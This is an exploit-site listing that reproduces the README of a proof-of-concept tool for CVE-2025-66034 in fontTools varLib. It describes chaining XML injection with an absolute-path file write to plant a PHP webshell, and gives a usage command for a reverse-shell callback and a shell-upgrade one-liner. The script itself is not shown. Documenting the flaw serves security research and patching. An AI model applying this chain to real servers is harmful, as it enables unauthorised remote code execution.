Exploit for XML Injection (aka Blind XPath Injection) in Fonttools CVE-2025-66034

Name: Exploit for XML Injection (aka Blind XPath Injection) in Fonttools CVE-2025-66034
Rating: 5 (151 reviews)
2026-03-28 | CVSS 9.8
## https://sploitus.com/exploit?id=3D0313B1-DD97-5AE1-AA14-E2F7D9DB8A59
# CVE-2025-66034 — fontTools varLib Arbitrary File Write → RCE

> **PoC exploit for an Arbitrary File Write + XML Injection vulnerability in `fontTools.varLib`**
> Tested on HackTheBox — VarIaType

---

## Vulnerability

`fontTools.varLib` processes `.designspace` XML files to build variable fonts. Two weaknesses combine to achieve pre-auth RCE:

| # | Primitive | Detail |
|---|-----------|--------|
| 1 | **XML Injection via CDATA split** | Attacker-controlled content inside `` is written verbatim into the output font file body, allowing arbitrary data injection |
| 2 | **Arbitrary File Write via `os.path.join()` bypass** | The `filename` attribute of `` accepts an absolute path. When passed to `os.path.join()`, it discards the intended output directory and writes to any attacker-specified filesystem path |

Chaining both primitives allows writing a PHP webshell to a web-accessible path, achieving unauthenticated Remote Code Execution.

---

## Usage

```bash
python3 font_varlib.py \
  --ip  \
  --port  \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files
```

### Options

| Flag | Description |
|------|-------------|
| `--ip` | Attacker IP for the reverse shell callback |
| `--port` | Listener port |
| `--upload` | Full URL of the font processing endpoint (POST) |
| `--webroot` | Server-side absolute path that maps to a web-accessible directory |
| `--shell` | Base URL under which the webshell will be accessible |
| `--no-listen` | Skip auto-listener — print manual commands instead |
| `--pwncat` | Use `pwncat-cs` instead of `nc` (preferred if available) |

### Dependencies

```bash
pip install requests fonttools
```

---

## How It Works

1. **Master fonts** — Two minimal `.ttf` files (`source-light.ttf`, `source-regular.ttf`) are generated using `fontTools.FontBuilder` as required masters for the designspace
2. **Malicious `.designspace`** — A crafted XML file is built with:
   - PHP webshell injected via a CDATA split inside ``
   - Absolute write path set as the `filename` of ``, bypassing `output_dir` via `os.path.join()`
3. **Upload** — The `.designspace` + master fonts are POSTed to the processing endpoint
4. **Trigger** — The planted `.php` file is requested, executing the reverse shell payload
5. **TTY upgrade** — On connection, the script automatically spawns a PTY via `python3 -c 'import pty; pty.spawn("/bin/bash")'` and sets `TERM` + `stty` for a fully interactive shell

---

## Disclosure

| Field | |
|-------|-|
| CVE | CVE-2025-66034 |
| Affected component | `fontTools.varLib` |
| Impact | Unauthenticated Arbitrary File Write → Remote Code Execution |
| Context | Web application exposing font processing endpoint |

---

## Legal

This tool is intended for **authorized penetration testing and CTF use only**.
Do not run against systems you do not own or have explicit written permission to test.

---

*by [4nuxd](https://github.com/4nuxd/CVE-2025-66034)*